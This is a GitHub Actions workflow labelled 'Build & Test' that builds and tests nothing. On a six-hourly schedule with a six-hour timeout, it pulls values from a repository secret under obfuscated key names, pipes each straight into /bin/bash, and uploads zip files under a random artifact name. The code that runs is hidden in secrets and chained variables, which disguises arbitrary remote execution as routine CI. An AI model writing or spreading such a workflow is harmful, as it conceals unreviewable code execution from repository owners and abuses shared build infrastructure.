name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '11 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          f0: ${{ secrets.f0 }}
        run: |
          printf '%s' "$f0" | jq -r .qrukv42878 | /bin/bash
          printf '%s' "$lzq4101" | jq -r .dtj73536 | /bin/bash
          printf '%s' "$xjmzd1489" | jq -r .rhir9929 | /bin/bash
          printf '%s' "$rvbn9595" | jq -r .exby62358 | /bin/bash
          echo $p531 | jq -r .u3 | /bin/bash
          printf '%s' "$p9475" | jq -r .ihya15048 | /bin/bash
          echo $wsg6 | jq -r .bfcdq58 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jWB1obK4
          path: "*.zip"
          retention-days: 1
